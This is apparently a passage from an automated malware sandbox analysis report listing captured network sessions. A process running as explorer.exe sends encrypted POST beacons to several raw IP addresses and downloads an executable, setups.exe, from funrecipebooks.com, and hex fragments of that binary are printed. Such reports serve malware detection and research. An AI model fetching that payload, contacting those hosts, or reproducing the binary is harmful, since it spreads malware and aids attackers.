                                                                                    2024-07-24 17:56:40 UTC1122OUTData Raw: 50 35 44 79 64 35 72 6b 4b 6c 2b 4f 33 64 50 6a 50 59 4e 44 77 46 48 71 4f 38 6e 6b 52 54 4a 41 73 62 56 6f 39 4d 48 2b 77 68 30 30 67 55 50 51 78 78 75 73 5a 2b 52 69 59 54 6a 4d 78 42 41 63 2f 5a 71 6f 6b 64 48 57 63 2f 2b 31 38 2f 39 4b 70 35 6c 6c 59 48 75 4f 61 49 72 63 37 44 6f 5a 55 49 4b 67 69 4d 33 65 47 68 4c 77 52 57 53 57 75 2f 48 4c 37 6b 52 71 53 59 62 72 4c 4d 33 65 52 58 77 54 53 35 64 2b 45 38 47 61 71 43 6c 47 6d 2f 7a 56 47 31 38 6f 78 67 62 6a 4b 53 73 64 35 32 47 7a 78 31 2b 6d 68 53 62 70 30 38 5a 33 32 42 74 69 44 45 6f 6f 59 33 54 50 64 78 76 32 54 36 46 4e 39 30 41 39 79 44 2f 75 2b 55 67 68 2b 61 36 39 76 59 42 6b 78 6b 39 6a 6e 70 67 66 63 7a 4c 6c 48 46 39 54 5a 4c 74 64 41 6a 57 74 33 44 41 48 58 6e 73 4a 2f 4d 37 2f 51 45 33
                                                                                    Data Ascii: P5Dyd5rkKl+O3dPjPYNDwFHqO8nkRTJAsbVo9MH+wh00gUPQxxusZ+RiYTjMxBAc/ZqokdHWc/+18/9Kp5llYHuOaIrc7DoZUIKgiM3eGhLwRWSWu/HL7kRqSYbrLM3eRXwTS5d+E8GaqClGm/zVG18oxgbjKSsd52Gzx1+mhSbp08Z32BtiDEooY3TPdxv2T6FN90A9yD/u+Ugh+a69vYBkxk9jnpgfczLlHF9TZLtdAjWt3DAHXnsJ/M7/QE3
                                                                                    2024-07-24 17:56:42 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:42 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:42 UTC685INData Raw: 6b 62 43 32 77 2b 58 4e 67 56 71 53 58 64 79 64 73 79 75 45 4f 6f 79 45 4b 39 6f 4c 74 4a 34 42 43 77 62 58 49 72 6c 65 59 33 4e 59 59 6c 42 47 37 76 4b 62 6b 56 70 4d 41 65 32 33 75 42 79 7a 32 63 57 63 4d 37 32 4d 33 6b 42 36 52 52 74 33 62 66 35 6d 59 55 30 64 69 68 46 76 57 73 42 53 6f 70 75 33 78 66 65 6b 67 42 7a 50 32 67 4e 65 6e 4f 43 32 66 4d 33 74 36 31 39 76 49 4b 63 4d 77 59 69 4a 58 53 6f 4f 30 67 6f 48 68 7a 46 31 2f 55 64 67 31 38 46 4e 64 38 6a 7a 65 6a 49 2b 7a 41 6b 5a 50 79 61 33 74 78 6f 73 7a 4a 50 49 57 45 62 4d 46 2f 35 69 78 41 32 66 4d 4e 4c 36 73 42 39 6b 61 45 42 58 46 54 38 69 55 6f 74 4d 31 45 39 4f 6c 2b 65 53 50 71 43 2f 53 65 47 68 32 72 72 74 44 4c 32 4f 73 64 31 6f 4c 51 44 51 2f 2b 5a 4e 6d 45 73 7a 2f 4e 4b 47 67 4f 6f
                                                                                    Data Ascii: kbC2w+XNgVqSXdydsyuEOoyEK9oLtJ4BCwbXIrleY3NYYlBG7vKbkVpMAe23uByz2cWcM72M3kB6RRt3bf5mYU0dihFvWsBSopu3xfekgBzP2gNenOC2fM3t619vIKcMwYiJXSoO0goHhzF1/Udg18FNd8jzejI+zAkZPya3txoszJPIWEbMF/5ixA2fMNL6sB9kaEBXFT8iUotM1E9Ol+eSPqC/SeGh2rrtDL2Osd1oLQDQ/+ZNmEsz/NKGgOo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.1049744167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:43 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1143
                                                                                    2024-07-24 17:56:43 UTC1143OUTData Raw: 4d 62 6d 47 55 61 35 70 57 63 67 36 79 48 59 47 2b 7a 79 6f 52 70 39 62 58 6e 42 72 38 44 47 75 65 65 4d 4c 6a 78 4f 6e 71 76 41 51 56 4e 31 49 75 53 35 73 2b 4a 71 47 61 51 37 51 6e 38 38 66 45 33 63 65 70 78 58 70 7a 77 49 6f 5a 62 72 35 37 79 65 55 69 77 63 42 6b 6a 55 62 74 4e 56 41 44 4a 4e 62 53 77 7a 70 58 67 6c 52 4c 65 73 57 69 44 42 4a 41 41 49 58 58 54 34 6e 64 71 33 42 5a 53 75 53 74 72 46 33 49 61 53 36 35 46 6d 58 56 76 45 64 53 6c 4c 31 2b 6e 71 31 4c 4e 52 6c 32 53 4a 4a 78 76 2b 36 52 35 53 62 6e 31 71 56 65 4a 30 49 35 44 54 39 77 69 79 74 54 36 5a 76 4e 74 4e 76 43 75 71 35 7a 79 55 59 75 31 56 72 46 75 6b 73 6e 58 64 6d 68 39 57 74 51 6e 41 75 41 35 73 32 41 56 39 4f 63 6c 62 54 4d 37 46 58 76 58 45 6a 6e 6e 7a 37 57 71 31 53 74 7a 41
                                                                                    Data Ascii: MbmGUa5pWcg6yHYG+zyoRp9bXnBr8DGueeMLjxOnqvAQVN1IuS5s+JqGaQ7Qn88fE3cepxXpzwIoZbr57yeUiwcBkjUbtNVADJNbSwzpXglRLesWiDBJAAIXXT4ndq3BZSuStrF3IaS65FmXVvEdSlL1+nq1LNRl2SJJxv+6R5Sbn1qVeJ0I5DT9wiytT6ZvNtNvCuq5zyUYu1VrFuksnXdmh9WtQnAuA5s2AV9OclbTM7FXvXEjnnz7Wq1StzA
                                                                                    2024-07-24 17:56:44 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:44 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:44 UTC685INData Raw: 4f 55 6d 75 4f 5a 31 45 64 78 67 35 39 42 35 4f 46 54 77 2f 33 51 48 71 48 76 74 39 64 43 45 76 55 69 34 79 75 4a 4b 38 4e 68 63 32 66 36 42 4c 31 35 68 77 66 74 42 57 34 4e 59 4e 6d 50 4c 37 4f 6b 56 4f 76 6d 56 67 34 6f 6e 65 4e 4f 57 6c 49 47 4b 54 31 59 69 77 2b 49 48 6d 6b 5a 43 70 65 48 6a 6d 31 45 4f 65 74 6e 31 62 70 69 65 70 42 44 63 70 74 42 78 68 35 32 66 4b 4d 49 45 6a 49 51 74 4a 70 6e 55 54 68 36 72 45 74 6a 47 6a 74 70 6f 38 6e 69 38 53 75 52 61 38 76 79 6a 66 50 4f 6d 32 34 44 51 61 61 59 49 79 71 56 59 66 4b 65 73 51 71 52 46 69 63 56 4b 38 43 7a 35 79 6d 35 6a 78 6f 6d 65 51 31 4b 61 34 7a 4a 76 61 72 42 49 35 52 6d 59 71 42 6e 46 69 31 4c 5a 49 4e 76 7a 48 71 65 6e 44 6b 67 47 4b 4b 4e 5a 6e 77 69 67 6f 66 64 79 68 4b 59 55 4f 43 64 2f
                                                                                    Data Ascii: OUmuOZ1Edxg59B5OFTw/3QHqHvt9dCEvUi4yuJK8Nhc2f6BL15hwftBW4NYNmPL7OkVOvmVg4oneNOWlIGKT1Yiw+IHmkZCpeHjm1EOetn1bpiepBDcptBxh52fKMIEjIQtJpnUTh6rEtjGjtpo8ni8SuRa8vyjfPOm24DQaaYIyqVYfKesQqRFicVK8Cz5ym5jxomeQ1Ka4zJvarBI5RmYqBnFi1LZINvzHqenDkgGKKNZnwigofdyhKYUOCd/


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.1049745162.0.235.844433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:43 UTC166OUTGET /setups.exe HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: funrecipebooks.com
                                                                                    2024-07-24 17:56:44 UTC289INHTTP/1.1 200 OK
                                                                                    keep-alive: timeout=5, max=100
                                                                                    content-type: application/x-msdownload
                                                                                    last-modified: Wed, 24 Jul 2024 14:01:43 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 141944
                                                                                    date: Wed, 24 Jul 2024 17:56:44 GMT
                                                                                    server: LiteSpeed
                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                    connection: close
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
                                                                                    2024-07-24 17:56:44 UTC8192INData Raw: 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a de 05 26 14 0c de 44 06 2d 02 14 2a 06 6f 6e 00 00 06 6f 61 00 00 0a 73 85 00 00 0a 0b 0d 16 13 04 2b 14 09 11 04 93 13 05 07 11 05 6f 87 00 00 0a 11 04 17 58 13 04 11 04 09 8e 69 32 e5 06 6f 6a 00 00 06 07 73 35 01 00 0a 2a 08 2a 00 00 01 10 00 00 00 00 1f 00 30 4f 00 05 17 00 00 01 1e 02 7b
                                                                                    Data Ascii: +oXi2ojs5**0O0*o3-rjpo3-rpo3-rprp(_+rp(_&D-*onoas+oXi2ojs5**0O{
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 72 23 1a 00 70 6f 94 01 00 0a 02 7b af 00 00 04 1f 4f 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b af 00 00 04 1f 1c 6f 97 01 00 0a 02 7b af 00 00 04 72 3d 1a 00 70 6f 25 01 00 0a 02 7b b0 00 00 04 17 6f c2 01 00 0a 02 7b b0 00 00 04 20 a4 00 00 00 1f 22 73 92 01 00 0a 6f 93 01 00 0a 02 7b b0 00 00 04 72 4d 1a 00 70 6f 94 01 00 0a 02 7b b0 00 00 04 20 88 00 00 00 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b b0 00 00 04 1f 1b 6f 97 01 00 0a 02 7b b0 00 00 04 72 6f 1a 00 70 6f 25 01 00 0a 02 22 00 00 30 41 22 00 00 c0 41 73 9e 01 00 0a 28 9f 01 00 0a 02 17 28 a0 01 00 0a 02 20 4f 03 00 00 20 b3 01 00 00 73 95 01 00 0a 28 a1 01 00 0a 02 28 a2 01 00 0a 02 7b aa 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ab 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ac 00
                                                                                    Data Ascii: r#po{Oso{o{r=po%{o{ "so{rMpo{ so{o{ropo%"0A"As(( O s(({o({o({
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 09 00 bd 30 01 00 11 00 bd 30 06 00 19 00 bd 30 0a 00 29 00 bd 30 10 00 31 00 bd 30 15 00 39 00 bd 30 15 00 41 00 bd 30 15 00 51 00 bd 30 1a 00 59 00 bd 30 06 00 71 00 bd 30 20 00 b1 00 bd 30 06 00 81 01 bd 30 06 00 91 01 bd 30 1a 00 31 02 bd 30 06 00 79 03 bd 30 26 00 81 03 bd 30 06 00 99 03 bd 30 2c 00 f1 03 78 10 3d 00 99 00 6b 34 46 00 61 00 bd 30 06 00 b9 00 bd 30 15 00 89 00 4b 13 53 00 01 04 f3 39 5b 00 09 04 bd 30 61 00 a1 00 7f 10 67 00 79 00 bd 30 72 00 19 04 5c 40 81 00 31 00 ca 18 8c 00 79 00 bd 30 15 00 21 04 bd 30 9a 00 19 02 bd 30 a0 00 19 02 c8 16 a7 00 19 02 1c 3d 06 00 19 02 cc 23 06 00 01 04 b1 3a bb 00 01 04 82 1a c2 00 01 04 26 1d c7 00 01 04 26 1d cd 00 01 04 3e 36 d2 00 81 00 bd 30 01 00 61 00 f7 1c 8c 00 49 04 fa 18 e8 00 51 04 ff
                                                                                    Data Ascii: 000)01090A0Q0Y0q0 00010y0&00,x=k4Fa00KS9[0agy0r\@1y0!00=#:&&>60aIQ
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 6e 63 65 6c 42 75 74 74 6f 6e 00 73 65 74 5f 53 68 6f 77 4e 65 77 46 6f 6c 64 65 72 42 75 74 74 6f 6e 00 73 65 74 5f 41 63 63 65 70 74 42 75 74 74 6f 6e 00 52 75 6e 00 43 6f 6d 70 61 72 65 54 6f 00 47 65 74 50 61 74 68 54 6f 00 55 6e 64 6f 00 5f 50 53 49 6e 66 6f 00 48 6f 73 74 43 6f 6d 6d 61 6e 64 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 55 49 43 75 6c 74 75 72 65 49 6e 66 6f 00 6f 72 69 67 69 6e 61 6c 43 75 6c 74 75 72 65 49 6e 66 6f 00 70 55 69 49 6e 66 6f 00 52 65 67 69 6f 6e 49 6e 66 6f 00 46 69 6c 65 56 65 72 73 69 6f 6e 49 6e 66 6f 00 47 65 74 56 65 72 73 69 6f 6e 49 6e 66 6f 00 76 65 72 73 69 6f 6e 49 6e 66 6f 00 67 65 74 5f 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 48 6f 73 74 49 6e 76 6f 63 61 74 69 6f 6e 49 6e 66 6f 00 68 52 65 73 49 6e 66 6f
                                                                                    Data Ascii: ncelButtonset_ShowNewFolderButtonset_AcceptButtonRunCompareToGetPathToUndo_PSInfoHostCommandInfooriginalUICultureInfooriginalCultureInfopUiInfoRegionInfoFileVersionInfoGetVersionInfoversionInfoget_InvocationInfoHostInvocationInfohResInfo
                                                                                    2024-07-24 17:56:44 UTC16320INData Raw: 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 80 8d 01 54 55 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 65 63 75 72 69 74 79 50 65 72 6d 69 73 73 69 6f 6e 46 6c 61 67 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 46 6c 61 67 73 00 04 00 00 80 95 2e 01 7f 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 41 74
                                                                                    Data Ascii: ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TUSystem.Security.Permissions.SecurityPermissionFlag, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089Flags.System.Security.Permissions.PermissionSetAt
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea fe 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea
                                                                                    Data Ascii: ffffffffffffffffffffffffffffffffffffffff
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 07 f0 01 ff 00 00 ff 83 80 01 c1 ff 00 00 ff 90 00 00 09 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff 80 00 00 01 ff 00 00 ff c0 00 00 03 ff 00 00 ff f0 00 00 0f ff 00 00 ff ff 00 00 ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 28 00 00 00 50 00 00 00 01 00 20 00 00 00 00 00 40 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: ((P @
                                                                                    2024-07-24 17:56:44 UTC16384INData Raw: 59 b1 e8 ff 59 b1 e8 be 00 00 00 00 00 00 00 00 00 00 00 00 59 b1 e8 05 59 b1 e8 5f 59 b1 e8 ab 59 b1 e8 dc 59 b1 e8 f9 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 ff 59 b1 e8 fa 59 b1 e8 de 59 b1 e8 af 59 b1 e8 65 59 b1 e8 08 00 00 00 00 00 00 00 00 e0 07 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 82 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 80 03 00 00 73 00 65 00 74 00 75 00 70 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: YYYY_YYYYYYYYYYeYsetups
                                                                                    2024-07-24 17:56:44 UTC2744INData Raw: 45 89 9d d1 33 da 32 02 23 db 12 08 eb 9d 50 9c fa 75 86 2a bd c5 4d 00 ca 8b cb cd bb 22 e7 09 51 e4 8a 78 8b f8 bc fb 1f 87 c1 82 4d 7a dc b9 71 8b 5d 58 9e ee 40 fe 98 69 9b 56 fe 33 68 1e 9e fa a8 d7 ed ab f2 25 4b 1e b1 11 80 51 8c 50 71 1d 2a b6 7f 38 54 43 9a 01 6b 09 36 3a c6 76 8f 4c 0e 7f ba bb 02 a8 c2 b7 ab 7f f9 f6 e6 5a 3a c0 59 85 99 1a 3f d1 2e 39 6d a9 d1 4f 06 92 0a a9 d8 63 54 8c 5a 1a 0c d5 85 a1 3f c4 72 81 83 89 38 0d f1 59 90 16 09 f4 15 ae 3f dd d3 9b ea 5a 58 10 f0 5c 8e c5 83 76 a5 1a c6 e8 12 b5 8f 5a 5b f0 30 09 a9 78 95 23 78 a2 d9 63 6e 89 3c bb 7d 65 67 1e 4d 55 ae 23 2b a3 7a ba 9b e4 83 26 7a a2 c9 9b 98 85 ab f4 32 e1 83 c6 c8 f8 a8 97 0e 70 d6 4f 4e 78 ee 04 ae 64 b6 14 ab e4 d5 e8 ef c3 84 96 47 e4 b5 57 25 a7 92 d6 38
                                                                                    Data Ascii: E32#Pu*M"QxMzq]X@iV3h%KQPq*8TCk6:vLZ:Y?.9mOcTZ?r8Y?ZX\vZ[0x#xcn<}egMU#+z&z2pONxdGW%8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.1049746107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:45 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1143
                                                                                    2024-07-24 17:56:45 UTC1143OUTData Raw: 6f 43 57 35 42 42 4d 75 47 4c 79 75 6b 43 72 50 35 4d 32 59 4a 51 4c 48 6e 70 37 79 6b 68 73 76 59 41 4d 62 72 68 4c 39 66 51 50 65 30 55 63 61 35 63 35 4e 61 7a 45 56 57 50 48 5a 54 6d 77 5a 55 2f 76 61 39 44 6b 78 53 53 2f 4e 50 65 4d 77 74 64 5a 55 67 6a 4f 63 46 52 71 39 51 46 67 4c 33 71 45 6a 53 33 43 37 6b 6f 67 56 42 4a 45 37 32 6c 77 56 44 73 5a 38 44 44 54 37 74 52 78 30 6d 62 53 59 43 64 56 61 5a 55 43 42 61 54 39 70 4a 74 4d 72 7a 43 4c 52 50 74 78 38 4c 46 59 6c 4b 47 57 38 4c 69 34 50 68 4e 68 77 2b 70 48 63 51 4b 6d 44 33 73 2f 7a 44 44 74 53 36 38 44 42 77 4f 6b 4c 64 62 4c 70 63 47 52 34 67 73 47 2b 64 70 6e 2f 30 6f 73 5a 64 51 59 54 78 33 6d 4c 47 42 36 72 37 6b 43 61 51 45 39 52 41 49 76 39 55 4b 73 58 76 33 6c 41 46 30 77 76 79 71 47
                                                                                    Data Ascii: oCW5BBMuGLyukCrP5M2YJQLHnp7ykhsvYAMbrhL9fQPe0Uca5c5NazEVWPHZTmwZU/va9DkxSS/NPeMwtdZUgjOcFRq9QFgL3qEjS3C7kogVBJE72lwVDsZ8DDT7tRx0mbSYCdVaZUCBaT9pJtMrzCLRPtx8LFYlKGW8Li4PhNhw+pHcQKmD3s/zDDtS68DBwOkLdbLpcGR4gsG+dpn/0osZdQYTx3mLGB6r7kCaQE9RAIv9UKsXv3lAF0wvyqG
                                                                                    2024-07-24 17:56:46 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:46 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:46 UTC685INData Raw: 58 69 62 37 5a 39 72 6f 72 73 63 76 41 46 6d 73 44 6f 46 2f 68 4d 51 46 4b 44 42 57 37 67 41 46 55 44 47 4e 7a 51 53 6c 4b 76 52 34 54 78 42 42 34 30 49 6d 36 70 6b 46 37 37 68 48 67 59 67 4c 42 68 67 39 38 66 4c 56 31 66 4e 6c 63 34 78 61 37 39 63 43 39 53 70 2b 45 38 62 68 6f 6c 6a 4b 6b 75 75 4e 69 42 39 6c 45 4f 57 2f 53 72 55 4a 6f 45 52 32 78 4a 55 4b 4f 6c 35 6d 72 6e 53 42 76 75 71 49 42 41 54 4d 53 6d 64 6a 55 74 4e 36 72 74 71 78 43 49 58 7a 44 4b 71 6e 76 46 72 47 39 2b 4a 6e 57 75 51 34 4e 6b 46 71 56 74 71 46 70 49 64 6d 72 52 76 49 45 64 31 63 50 6b 32 6c 2f 7a 76 6e 75 65 4d 4b 48 50 31 43 6e 46 70 71 70 70 53 64 79 71 4d 4c 43 4c 53 34 70 35 69 69 58 43 66 71 79 38 73 32 53 33 50 2b 51 4d 45 74 47 75 62 79 71 64 6d 67 2f 51 66 70 56 51 57
                                                                                    Data Ascii: Xib7Z9rorscvAFmsDoF/hMQFKDBW7gAFUDGNzQSlKvR4TxBB40Im6pkF77hHgYgLBhg98fLV1fNlc4xa79cC9Sp+E8bholjKkuuNiB9lEOW/SrUJoER2xJUKOl5mrnSBvuqIBATMSmdjUtN6rtqxCIXzDKqnvFrG9+JnWuQ4NkFqVtqFpIdmrRvIEd1cPk2l/zvnueMKHP1CnFpqppSdyqMLCLS4p5iiXCfqy8s2S3P+QMEtGubyqdmg/QfpVQW


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.1049750107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:47 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:56:47 UTC1267OUTData Raw: 56 36 45 58 65 78 49 72 56 55 59 68 76 65 46 68 50 33 35 45 65 6b 67 4f 2b 57 57 2f 54 6a 33 4d 53 71 68 4c 32 74 42 4a 41 72 37 69 75 77 33 47 41 4c 4f 41 65 4d 4f 30 48 42 32 6c 31 48 71 6c 7a 4e 30 39 59 63 79 35 77 62 64 32 76 4a 38 75 43 74 65 55 52 54 6f 4c 78 54 4b 42 59 77 69 51 39 6e 47 34 6e 48 6c 59 54 4e 51 32 51 64 38 79 43 6f 61 38 30 41 39 62 42 79 66 59 5a 61 6e 2f 58 47 43 63 76 55 6b 70 74 62 61 4c 48 33 31 7a 55 65 77 6b 34 36 4a 63 65 74 69 39 32 48 36 51 5a 2b 50 37 70 46 6c 74 49 34 64 2f 2b 55 58 59 54 39 58 72 67 36 30 2b 71 72 37 78 7a 68 4c 67 77 70 30 73 74 45 41 34 41 67 62 4c 69 49 54 67 7a 51 67 52 77 30 79 57 41 5a 46 53 49 41 36 32 59 46 38 4d 41 64 55 4b 6a 69 4d 68 5a 56 49 6f 72 6d 47 61 41 38 34 6d 68 37 5a 52 63 53 79
                                                                                    Data Ascii: V6EXexIrVUYhveFhP35EekgO+WW/Tj3MSqhL2tBJAr7iuw3GALOAeMO0HB2l1HqlzN09Ycy5wbd2vJ8uCteURToLxTKBYwiQ9nG4nHlYTNQ2Qd8yCoa80A9bByfYZan/XGCcvUkptbaLH31zUewk46Jceti92H6QZ+P7pFltI4d/+UXYT9Xrg60+qr7xzhLgwp0stEA4AgbLiITgzQgRw0yWAZFSIA62YF8MAdUKjiMhZVIormGaA84mh7ZRcSy
                                                                                    2024-07-24 17:56:48 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:48 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
